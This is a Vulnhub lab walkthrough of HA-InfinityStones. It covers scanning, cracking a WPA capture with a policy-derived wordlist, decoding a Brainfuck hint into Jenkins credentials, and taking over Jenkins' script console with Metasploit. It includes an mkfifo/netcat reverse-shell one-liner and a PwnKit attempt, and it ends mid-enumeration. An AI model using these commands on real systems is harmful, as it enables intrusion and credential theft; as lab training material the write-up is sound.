HA-InfinityStones - Vulnhub - Level: Medium - Report

Medium

Tools used

arp-scan
vi
nmap
curl
nikto
gobuster
dirb
java
msfconsole
wget
crunch
aircrack-ng
javac
nc

Table of contents

Reconnaissance

Login User: Stones
morag
We already know the login credentials for these users.
ARP-Scan
192.168.2.160 08:00:27:9c:6d:99 PCS Systemtechnik GmbH
We use arp-scan to determine the IP address and MAC address of the target system. This lets us identify the target on the network.
/etc/hosts
192.168.2.160 ha-stones.vln
We add the target's IP address and hostname to the /etc/hosts file so that we can address the target by hostname.
┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000
Starting Nmap 7.94SVN (https://nmap.org) at 2025-01-02 22:30 CET
Nmap scan report for ubuntu (192.168.2.160)
Host is up (0.00013s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 84:d2:2e:c4:f7:21:12:54:05:ac:82:c4:05:f2:32:29 (RSA)
|   256 f7:9d:0f:23:ec:d6:de:ed:2b:b2:11:bf:ea:68:3d:b9 (ECDSA)
|_  256 78:ef:fc:36:47:e6:f3:8d:03:3a:39:69:60:4f:2a:71 (ED25519)
80/tcp   open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA:Infinity Stones
443/tcp  open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HA:Infinity Stones
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
| ssl-cert: Subject: commonName=ignite/organizationName=MINDSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}/staterProvinceName=UP/countryName=IN
| Not valid before: 2019-09-15T17:18:57
|_Not valid after:  2020-09-14T17:18:57
8080/tcp open  http     Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
MAC Address: 08:00:27:9C:6D:99 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.13 ms ubuntu (192.168.2.160)
We run a comprehensive Nmap scan to identify open ports and services, using a high scan rate (--min-rate 5000). We find that port 22 (SSH), port 80 (HTTP), port 443 (HTTPS) and port 8080 (Jetty) are open.
┌──(root㉿CCat)-[~]
└─# curl --verbose -I http://192.168.2.160:8080 -s
*   Trying 192.168.2.160:8080...
* Connected to 192.168.2.160 (192.168.2.160) port 8080
* using HTTP/1.x
> HEAD / HTTP/1.1
> Host: 192.168.2.160:8080
> User-Agent: curl/8.10.1
> Accept: */*
> 
* Request completely sent off
< HTTP/1.1 403 Forbidden
HTTP/1.1 403 Forbidden
< Date: Thu, 02 Jan 2025 21:36:22 GMT
Date: Thu, 02 Jan 2025 21:36:22 GMT
< X-Content-Type-Options: nosniff
X-Content-Type-Options: nosniff
< Set-Cookie: JSESSIONID.f32d1263=node0u1c5j566ex9d17b5i2zcxa3lj60.node0;Path=/;HttpOnly
Set-Cookie: JSESSIONID.f32d1263=node0u1c5j566ex9d17b5i2zcxa3lj60.node0;Path=/;HttpOnly
< Expires: Thu, 01 Jan 1970 00:00:00 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
< Content-Type: text/html;charset=utf-8
Content-Type: text/html;charset=utf-8
< X-Hudson: 1.395
X-Hudson: 1.395
< X-Jenkins: 2.176.3
X-Jenkins: 2.176.3
< X-Jenkins-Session: 192f54bf
X-Jenkins-Session: 192f54bf
< X-You-Are-Authenticated-As: anonymous
X-You-Are-Authenticated-As: anonymous
< X-You-Are-In-Group-Disabled: JENKINS-39402: use -Dhudson.security.AccessDeniedException2.REPORT_GROUP_HEADERS=true or use /whoAmI to diagnose
X-You-Are-In-Group-Disabled: JENKINS-39402: use -Dhudson.security.AccessDeniedException2.REPORT_GROUP_HEADERS=true or use /whoAmI to diagnose
< X-Required-Permission: hudson.model.Hudson.Read
X-Required-Permission: hudson.model.Hudson.Read
< X-Permission-Implied-By: hudson.security.Permission.GenericRead
X-Permission-Implied-By: hudson.security.Permission.GenericRead
< X-Permission-Implied-By: hudson.model.Hudson.Administer
X-Permission-Implied-By: hudson.model.Hudson.Administer
< Content-Length: 793
Content-Length: 793
< Server: Jetty(9.4.z-SNAPSHOT)
Server: Jetty(9.4.z-SNAPSHOT)
We send a HEAD request to port 8080 and see that it is a Jetty server hosting Jenkins (X-Jenkins: 2.176.3). We receive a 403 Forbidden because the anonymous user lacks the required read permission.
┌──(root㉿CCat)-[~]
└─# nikto -h 192.168.2.160
- Nikto v2.5.0

+ Target IP:          192.168.2.160
+ Target Hostname:    192.168.2.160
+ Target Port:        80
+ Start Time:         2025-01-02 22:31:43 (GMT+0100)

+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ RFC-1918 /images: IP address found in the 'location' header. The IP is "fe80::da6a:fda6:7681:d707". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "fe80::da6a:fda6:7681:d707". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ /: Server may leak inodes via ETags, header found with file /, inode: cbd, size: 592a4bf89c606, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET .
+ /img/: Directory indexing found.
+ /img/: This might be interesting.
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2025-01-02 22:32:30 (GMT+0100) (47 seconds)

+ 1 host(s) tested
We use Nikto to check the web server on port 80 for weaknesses. We find that important security headers are missing and that directory indexing is enabled.
┌──(root㉿CCat)-[~]
└─# gobuster dir -u "http://$IP" -w "/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -x txt,php,rar,zip,tar,pub,xls,docx,doc,sql,db,mdb,asp,aspx,accdb,bat,ps1,exe,sh,py,pl,gz,jpeg,jpg,png,html,phtml,xml,csv,dll,pdf,raw,rtf,xlsx,zip,kdbx,bak,svg,pem,crt,json,conf,ELF,elf,c,java,lib,cgi,csh,config,deb,desc,exp,eps,diff,icon,mod,ln,old,rpm,js.map,pHtml" -b '503,404,403' -e --no-error -k
We use Gobuster to search for hidden files and directories. We find "index.html", "images", "img", "wifi", "aether.php" and, on port 8080, a robots.txt.
------------------------------------------------------------------------------------
http://192.168.2.160:8080/robots.txt
User-agent: *
Disallow: /
We look at the robots.txt on port 8080 and see that everything is disallowed.
┌──(root㉿CCat)-[~]
└─# dirb http://192.168.2.160:8080 -X .txt -w
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Jan  2 22:41:37 2025
URL_BASE: http://192.168.2.160:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Stopping on warning messages
EXTENSIONS_LIST: (.txt) | (.txt) [NUM = 1]

--

GENERATED WORDS: 4612                                                          
+ http://192.168.2.160:8080/robots.txt (CODE:200|SIZE:71)   
--
END_TIME: Thu Jan  2 22:41:50 2025
DOWNLOADED: 4612 - FOUND: 1
We use Dirb to brute-force files on the web server and find the file robots.txt.
┌──(root㉿CCat)-[~]
└─# curl -k -4 -s http://192.168.2.160:8080/securityRealm/user/admin/search/index?q=a
HTTP ERROR 404
Problem accessing /securityRealm/user/admin/search/index. Reason:
Not Found
Powered by Jetty:// 9.4.z-SNAPSHOT
We try to access this path on the Jetty server but receive a 404 error.
------------------------------------------------------------------------------------
http://192.168.2.160/wifi/
Index of /wifi
[ICO]	Name	Last modified	Size	Description

[PARENTDIR] Parent Directory                      -
[TXT]       pwd.txt           2019-09-15 09:42  254
[   ]       reality.cap       2019-09-15 00:43  262K
We navigate to the "/wifi" directory and find the files "pwd.txt" and "reality.cap".
------------------------------------------------------------------------------------
http://192.168.2.160/wifi/pwd.txt
Your Password is thanos daughter name "gam" (note it's all lower case) plus the following
I enforced new password requirement on you ... 12 characters

One uppercase charracter
Two Numbers
Two Lowercase
The Year of first avengers came out in threatre
We read the contents of "pwd.txt" and find instructions describing how the password is built.
------------------------------------------------------------------------------------
┌──(root㉿CCat)-[~]
└─# crunch 12 12 -t gam,%%@@2012 -o dict.txt
Crunch will now generate the following amount of data: 22848800 bytes
21 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 1757600 

crunch: 100% completed generating output
We use Crunch to generate a wordlist from the policy described in "pwd.txt": the fixed prefix "gam", one uppercase character (","), two digits ("%%"), two lowercase characters ("@@") and the fixed year 2012.
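The wordlist step above, as an added example that is not part of the original write-up: a small expander for crunch-style -t patterns (only the "@", "," and "%" placeholders are modelled) that shows how much the leaked policy shrinks the keyspace and how long a crack at a given rate takes. The pattern, the found key and the aircrack-ng rate are taken from the output above; the function names are this example's own.

```python
import itertools
import string

# Placeholder classes as used by crunch -t (subset): @ lowercase, , uppercase,
# % digit. Any other character in the pattern is taken literally.
PLACEHOLDERS = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
}

PATTERN = "gam,%%@@2012"      # the pattern derived from pwd.txt
FOUND_KEY = "gamA00fe2012"    # the key aircrack-ng recovered above
REPORTED_RATE = 4340.75       # keys/s reported by aircrack-ng above


def candidate_count(pattern):
    """Number of candidates the pattern expands to (crunch's 'number of lines')."""
    count = 1
    for ch in pattern:
        count *= len(PLACEHOLDERS.get(ch, ch))
    return count


def expand_pattern(pattern):
    """Lazily yield every candidate, rightmost placeholder varying fastest."""
    pools = [PLACEHOLDERS.get(ch, ch) for ch in pattern]
    for combo in itertools.product(*pools):
        yield "".join(combo)


def matches_pattern(candidate, pattern):
    """True if the candidate could have been produced by the pattern."""
    if len(candidate) != len(pattern):
        return False
    return all(c in PLACEHOLDERS.get(p, p) for c, p in zip(candidate, pattern))


def seconds_to_exhaust(pattern, keys_per_second):
    """Worst-case time to try every candidate at the given cracking rate."""
    return candidate_count(pattern) / keys_per_second


if __name__ == "__main__":
    print("candidates:", candidate_count(PATTERN))                  # 1757600
    print("found key fits policy:", matches_pattern(FOUND_KEY, PATTERN))
    print("worst case at %.0f k/s: %.0f s" % (REPORTED_RATE / 1000,
                                              seconds_to_exhaust(PATTERN, REPORTED_RATE)))
```

At the rate aircrack-ng reported, exhausting the list takes about 405 seconds, which matches its "Time left: 6 minutes, 44 seconds" estimate.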
┌──(root㉿CCat)-[~]
└─# wget http://192.168.2.160/wifi/reality.cap
--2025-01-02 23:08:56--  http://192.168.2.160/wifi/reality.cap
Verbindungsaufbau zu 192.168.2.160:80 … verbunden.
HTTP-Anforderung gesendet, auf Antwort wird gewartet … 200 OK
Länge: 267995 (262K) [application/vnd.tcpdump.pcap]
Wird in reality.cap gespeichert.

reality.cap             100%[=======================================>] 261,71K  --.-KB/s    in 0,001s  

2025-01-02 23:08:56 (230 MB/s) - reality.cap gespeichert [267995/267995]
We download the file "reality.cap".
┌──(root㉿CCat)-[~]
└─# aircrack-ng -w dict.txt reality.cap
                               Aircrack-ng 1.7 

      [00:00:00] 96/1757600 keys tested (4340.75 k/s) 

      Time left: 6 minutes, 44 seconds                           0.01%

                         KEY FOUND! [ gamA00fe2012 ]

      Master Key     : 82 35 98 B2 82 D9 D1 3F 7E C7 74 52 68 EC A4 85 
                       2A 91 A7 13 E0 1A B7 5B B5 45 DE 63 5D D0 C9 3B 

      Transient Key  : BA 86 D4 FC C4 C1 55 5E 21 06 76 46 D5 E4 C1 4B 
                       5D A9 2F 40 E8 A2 49 61 6F 3B 0F 4C 81 E7 19 B8 
                       03 E8 2E 64 4C DE EA 9E 1B 2F 2C BD 6B A2 1D F8 
                       AA 41 68 FE 18 30 67 7E F8 89 19 32 61 FB A8 2E 

      EAPOL HMAC     : 99 4E 9F CD 7F 6B B2 60 C6 F8 22 DA DC C3 C1 95 
We use aircrack-ng with the generated wordlist to crack the WPA handshake in the capture. We find the password gamA00fe2012.
Now, for the next stone, we opened the target IP on port 443; it had a redirecting link at the top right. Clicking the link takes us to a page with a quiz about the Avengers, plus a hint relating to binary.
Solving the quiz gave the following answers with their corresponding binary values:

No.  Question                                                            Answer  Binary
1.   In the beginning, there are 3 infinity stones on earth.             False   0
2.   At the end, there are two survivors on Titan.                       True    1
3.   Thanos already had the power stone when he first appeared.          True    1
4.   Tesseract contains the reality stone.                               False   0
5.   The dwarf on Ndavellir is played by Peter Dinklage                  True    1
6.   Red skull is the guardian of space stone.                           False   0
7.   Thor's new hammer is called stormbuster.                            False   0
8.   Rocket is the only Guardian of the Galaxy to survive the snap.      True    1

After solving the quiz and writing down the binary values in order, we have the binary string
01101001. We opened this string as a path in the URL and found a hints.txt there; opening it
revealed text encoded as a Brainfuck program.
------------------------------------------------------------------------------------
http://192.168.2.160/01101001/
Index of /01101001
[ICO]	Name	Last modified	Size	Description

[PARENTDIR] Parent Directory                      -
[TXT]       hints.txt         2019-09-15 09:59  233
We navigate to the "/01101001" directory and find the file "hints.txt".
------------------------------------------------------------------------------------
http://192.168.2.160/01101001/hints.txt
+++++ ++++[ ->+++ +++++ +<]>+ +++++ +++++ +++++ .+++. +++++ ++++. -. +++++ .<+++ ++++[ -> -< ]> .<+++ +++[- >++++ ++<]> +++.< ++++[ ->+++ +<]>+ ++++. <++++ [->-- --<]> -.+++ +++++ +. -. --.<+ ++[->+++<] >++++ .+.<
We read the contents of "hints.txt" and find Brainfuck code.
admin:avengers
We run the code through a Brainfuck interpreter; the decoded result is admin:avengers.
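The decoding step above, as an added example that is not code from the original write-up: a minimal Brainfuck interpreter (8-bit wrapping cells, non-command characters such as the spaces in hints.txt ignored, and a step limit so a garbled or hostile hint cannot hang the decoder) together with a simple encoder that produces a hint in the same spirit. The sample it round-trips is the credential pair found above; all function names are this example's own.

```python
def run_brainfuck(program, max_steps=1_000_000):
    """Execute `program` and return everything it printed as a string."""
    code = [c for c in program if c in "<>+-.,[]"]   # drop spaces/newlines

    # Pre-compute matching bracket positions so loop jumps are O(1) and
    # unbalanced programs are rejected before execution.
    jumps, stack = {}, []
    for pos, ch in enumerate(code):
        if ch == "[":
            stack.append(pos)
        elif ch == "]":
            if not stack:
                raise ValueError("unmatched ']' at command %d" % pos)
            start = stack.pop()
            jumps[start], jumps[pos] = pos, start
    if stack:
        raise ValueError("unmatched '[' at command %d" % stack[-1])

    tape = [0] * 30000
    ptr = pc = steps = 0
    out = []
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded (looping program?)")
        ch = code[pc]
        if ch == ">":
            ptr += 1
        elif ch == "<":
            ptr -= 1
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF      # 8-bit cell, wraps
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ".":
            out.append(chr(tape[ptr]))
        elif ch == "[" and tape[ptr] == 0:
            pc = jumps[pc]                           # skip the loop body
        elif ch == "]" and tape[ptr] != 0:
            pc = jumps[pc]                           # repeat the loop body
        # ',' (read input) is a no-op here: hint programs take no input.
        if not 0 <= ptr < len(tape):
            raise IndexError("tape pointer left the tape")
        pc += 1
    return "".join(out)


def encode_brainfuck(text):
    """Emit a Brainfuck program that prints `text`, using a single cell and
    +/- deltas between consecutive characters (the hint on the page uses the
    same one-cell idea, with multiplication loops to shorten long runs)."""
    parts, current = [], 0
    for ch in text:
        delta = ord(ch) - current
        parts.append(("+" if delta > 0 else "-") * abs(delta) + ".")
        current = ord(ch)
    return "".join(parts)


if __name__ == "__main__":
    hint = encode_brainfuck("admin:avengers")   # constructed sample hint
    print(hint)
    print(run_brainfuck(hint))                   # admin:avengers
```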
------------------------------------------------------------------------------------
http://192.168.2.160:8080/
Skip to content
[Jenkins]Jenkins
admin | Abmelden
We open the Jenkins web interface on port 8080.
------------------------------------------------------------------------------------
We log in to the Jenkins server as admin with the password avengers.
┌──(root㉿CCat)-[~]
└─# java -jar jenkins-cli.jar -s http://ha-stones.vln:8080/
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Jan. 02, 2025 11:25:10 PM org.apache.sshd.common.util.security.AbstractSecurityProviderRegistrar getOrCreateProvider
INFORMATION: getOrCreateProvider(EdDSA) created instance of net.i2p.crypto.eddsa.EdDSASecurityProvider
java.net.UnknownHostException: ha-stones.vln
	at java.base/sun.nio.ch.NioSocketImpl.connect(NioSocketImpl.java:567)
	at java.base/java.net.Socket.connect(Socket.java:760)
	at java.base/java.net.Socket.connect(Socket.java:695)
	at java.base/sun.net.NetworkClient.doConnect(NetworkClient.java:183)
	at java.base/sun.net.www.http.HttpClient.openServer(HttpClient.java:531)
	at java.base/sun.net.www.http.HttpClient.openServer(HttpClient.java:636)
	at java.base/sun.net.www.http.HttpClient.<init>(HttpClient.java:280)
	at java.base/sun.net.www.http.HttpClient.New(HttpClient.java:386)
	at java.base/sun.net.www.http.HttpClient.New(HttpClient.java:408)
	at java.base/sun.net.www.protocol.http.HttpURLConnection.getNewHttpClient(HttpURLConnection.java:1295)
	at java.base/sun.net.www.protocol.http.HttpURLConnection.plainConnect0(HttpURLConnection.java:1228)
	at java.base/sun.net.www.protocol.http.HttpURLConnection.plainConnect(HttpURLConnection.java:1114)
	at java.base/sun.net.www.protocol.http.HttpURLConnection.connect(HttpURLConnection.java:1043)
	at java.base/sun.net.www.protocol.http.HttpURLConnection.getOutputStream0(HttpURLConnection.java:1445)
	at java.base/sun.net.www.protocol.http.HttpURLConnection.getOutputStream(HttpURLConnection.java:1408)
	at hudson.cli.FullDuplexHttpStream.<init>(FullDuplexHttpStream.java:71)
	at hudson.cli.CLI.plainHttpConnection(CLI.java:279)
	at hudson.cli.CLI._main(CLI.java:271)
	at hudson.cli.CLI.main(CLI.java:83)
We try the Jenkins CLI, but the connection fails with an UnknownHostException for ha-stones.vln.
┌──(root㉿CCat)-[~]
└─# msfconsole -q -x "search jenkins_script_console"
Matching Modules
================

   #  Name                                       Disclosure Date  Rank  Check  Description
   -  ----                                      ---------------  ----  -----  -----------
   0  exploit/multi/http/jenkins_script_console  2013-01-18       good  Yes    Jenkins-CI Script-Console Java Execution
   1    \_ target: Windows                       .                .     .      .
   2    \_ target: Linux                         .                .     .      .
   3    \_ target: Unix CMD                      .                .     .      .


Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/http/jenkins_script_console
After interacting with a module you can manually set a TARGET with set TARGET 'Unix CMD'
We search for the matching exploit module.
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(multi/http/jenkins_script_console) > options
Module options (exploit/multi/http/jenkins_script_console):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   API_TOKEN                   no        The API token for the specified username
   PASSWORD   avengers         no        The password for the specified username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.2.160    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path to the Jenkins-CI application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            no        The username to authenticate as
   VHOST                       no        HTTP server virtual host


   When CMDSTAGERFLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.2.199    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   Unix CMD
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/jenkins_script_console) > show payloads
Compatible Payloads
===================

   #   Name                                                  Disclosure Date  Rank    Check  Description
   -   ----                                                  ---------------  ----    -----  -----------
   0   payload/cmd/unix/adduser                              .                normal  No     Add user with useradd
   1   payload/cmd/unix/bind_awk                             .                normal  No     Unix Command Shell, Bind TCP (via AWK)
   2   payload/cmd/unix/bind_aws_instance_connect            .                normal  No     Unix SSH Shell, Bind Instance Connect (via AWS API)
   3   payload/cmd/unix/bind_busybox_telnetd                 .                normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   4   payload/cmd/unix/bind_jjs                             .                normal  No     Unix Command Shell, Bind TCP (via jjs)
   5   payload/cmd/unix/bind_lua                             .                normal  No     Unix Command Shell, Bind TCP (via Lua)
   6   payload/cmd/unix/bind_netcat                          .                normal  No     Unix Command Shell, Bind TCP (via netcat)
   7   payload/cmd/unix/bind_netcat_gaping                   .                normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   8   payload/cmd/unix/bind_netcat_gaping_ipv6              .                normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   9   payload/cmd/unix/bind_nodejs                          .                normal  No     Unix Command Shell, Bind TCP (via nodejs)
   10  payload/cmd/unix/bind_perl                            .                normal  No     Unix Command Shell, Bind TCP (via Perl)
   11  payload/cmd/unix/bind_perl_ipv6                       .                normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   12  payload/cmd/unix/bind_r                               .                normal  No     Unix Command Shell, Bind TCP (via R)
   13  payload/cmd/unix/bind_ruby                            .                normal  No     Unix Command Shell, Bind TCP (via Ruby)
   14  payload/cmd/unix/bind_ruby_ipv6                       .                normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   15  payload/cmd/unix/bind_socat_sctp                      .                normal  No     Unix Command Shell, Bind SCTP (via socat)
   16  payload/cmd/unix/bind_socat_udp                       .                normal  No     Unix Command Shell, Bind UDP (via socat)
   17  payload/cmd/unix/bind_stub                            .                normal  No     Unix Command Shell, Bind TCP (stub)
   18  payload/cmd/unix/bind_zsh                             .                normal  No     Unix Command Shell, Bind TCP (via Zsh)
   19  payload/cmd/unix/generic                              .                normal  No     Unix Command, Generic Command Execution
   20  payload/cmd/unix/pingback_bind                        .                normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   21  payload/cmd/unix/pingback_reverse                     .                normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   22  payload/cmd/unix/python/meterpreter/bind_tcp          
...
.....
msf6 exploit(multi/http/jenkins_script_console) > set payload payload/cmd/unix/python/meterpreter_reverse_tcp
payload => cmd/unix/python/meterpreter_reverse_tcp
msf6 exploit(multi/http/jenkins_script_console) > run
[*] Started reverse TCP handler on 192.168.2.199:4444 
[*] Checking access to the script console
[*] Logging in...
[*] Using CSRF token: '6fe46b32d0ba77e9a3d2141afbf19d08' (Jenkins-Crumb style v1)
[*] 192.168.2.160:8080 - Sending payload...
[*] Meterpreter session 1 opened (192.168.2.199:4444 -> 192.168.2.160:52120) at 2025-01-02 23:33:33 +0100
meterpreter > getuid
Server username: jenkins
We obtain a Meterpreter session as the user "jenkins".
meterpreter > ls /home
Listing: /home

Mode              Size  Type  Last modified              Name
----              ----  ----  ---------------              ----
040755/rwxr-xr-x  4096  dir   2019-09-16 06:57:24 +0200  morag
040755/rwxr-xr-x  4096  dir   2019-09-16 08:21:03 +0200  stones
We list the contents of the /home directory.
meterpreter > shell
Process 20503 created.
Channel 1 created.
id
uid=123(jenkins) gid=127(jenkins) groups=127(jenkins)
We drop into a shell.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.2.199 4445 >/tmp/f
rm: cannot remove '/tmp/f': No such file or directory
We try to establish a more stable reverse shell via netcat.
┌──(root㉿CCat)-[~]
└─# nc -lvnp 4445
listening on [any] 4445 ...
connect to [192.168.2.199] from (UNKNOWN) [192.168.2.160] 49158
/bin/sh: 0: can't access tty; job control turned off
$
We receive a shell via netcat.
which python
which python3
/usr/bin/python3
jenkins@ubuntu:/$ stty rows 47 columns 94
jenkins@ubuntu:/$ sudo -l
[sudo] password for jenkins: 
jenkins@ubuntu:/$ find / -type f -perm -4000 -ls 2>/dev/null
   131231     28 -rwsr-xr-x   1 root     root        26696 Sep 16  2020 /bin/umount
   134568     44 -rwsr-xr-x   1 root     root        44664 Nov 29  2022 /bin/su
   131155     44 -rwsr-xr-x   1 root     root        43088 Sep 16  2020 /bin/mount
   131130     32 -rwsr-xr-x   1 root     root        30800 Aug 11  2016 /bin/fusermount
   131203     64 -rwsr-xr-x   1 root     root        64424 Mar  9  2017 /bin/ping
   922020     12 -rwsr-xr-x   1 root     root         8304 Sep 15  2019 /opt/script
   134641     76 -rwsr-xr-x   1 root     root        76496 Nov 29  2022 /usr/bin/chfn
   131256     24 -rwsr-xr-x   1 root     root        22520 Jan 12  2022 /usr/bin/pkexec
   134656     76 -rwsr-xr-x   1 root     root        75824 Nov 29  2022 /usr/bin/gpasswd
   134544     24 -rwsr-xr-x   1 root     root        22528 Mar  9  2017 /usr/bin/arping
   134648     44 -rwsr-xr-x   1 root     root        44528 Nov 29  2022 /usr/bin/chsh
   134577     40 -rwsr-xr-x   1 root     root        40344 Nov 29  2022 /usr/bin/newgrp
   135086    148 -rwsr-xr-x   1 root     root       149080 Apr  4  2023 /usr/bin/sudo
   131076     12 -rwsr-xr-x   1 root     root        10312 Aug 16  2022 /usr/bin/vmware-user-suid-wrapper
   135804     20 -rwsr-xr-x   1 root     root        18448 Mar  9  2017 /usr/bin/traceroute6.iputils
   134658     60 -rwsr-xr-x   1 root     root        59640 Nov 29  2022 /usr/bin/passwd
   134834    372 -rwsr-xr--   1 root     dip        378600 Jul 23  2020 /usr/sbin/pppd
   263218     12 -rwsr-xr-x   1 root     root        10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
   273042     12 -rwsr-sr-x   1 root     root        10232 Mar 29  2023 /usr/lib/xorg/Xorg.wrap
   268763     16 -rwsr-xr-x   1 root     root        14328 Jan 12  2022 /usr/lib/policykit-1/polkit-agent-helper-1
   263936    128 -rwsr-xr-x   1 root     root       130264 May 29  2023 /usr/lib/snapd/snap-confine
   271769    428 -rwsr-xr-x   1 root     root         436552 Aug 11  2021 /usr/lib/openssh/ssh-keysign 
       66     40 -rwsr-xr-x   1 root     root               40152 May 15  2019 /snap/core/7713/bin/mount
       80     44 -rwsr-xr-x   1 root     root               44168 May  7  2014 /snap/core/7713/bin/ping
       81     44 -rwsr-xr-x   1 root     root               44680 May  7  2014 /snap/core/7713/bin/ping6 
     7626    386 -rwsr-xr--   1 root     dip               394984 Jun 12  2018 /snap/core/7713/usr/sbin/pppd
We search for SUID files and find /opt/script.
The output of "find / -type f -perm -4000 -ls 2>/dev/null" shows an interesting executable: "/opt/script". We examine this file more closely to determine whether it offers a path to privilege escalation.
msf6 exploit(multi/http/jenkins_script_console) > use 1
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions -l
Active sessions = Id Name Type Information Connection -- ---- ---- -- - 1 meterpreter python/linux jenkins @ ubuntu 192.168.2.199:4444 -> 192.168.2.160: 52120 (192.168.2.160)
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set session 1
session => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[*] Started reverse TCP handler on 192.168.2.199:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit failed [user-interrupt]: Rex::TimeoutError: Send timed out
[-] run: Interrupted
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set AutoCheck false"
[-] Parse error: Unmatched quote: "set AutoCheck false\""
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[*] Started reverse TCP handler on 192.168.2.199:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit failed [user-interrupt]: Rex::TimeoutError: Send timed out
[-] run: Interrupted
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set AutoCheck false
AutoCheck => false
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[*] Started reverse TCP handler on 192.168.2.199:4444 
[!] AutoCheck is disabled, proceeding with exploitation
[-] Exploit failed [user-interrupt]: Rex::TimeoutError: Send timed out
[-] run: Interrupted
jenkins@ubuntu:/opt$ strings /opt/script
/lib64/ld-linux-x86-64.so.2
libc.so.6
printf
__cxa_finalize
__libc_start_main
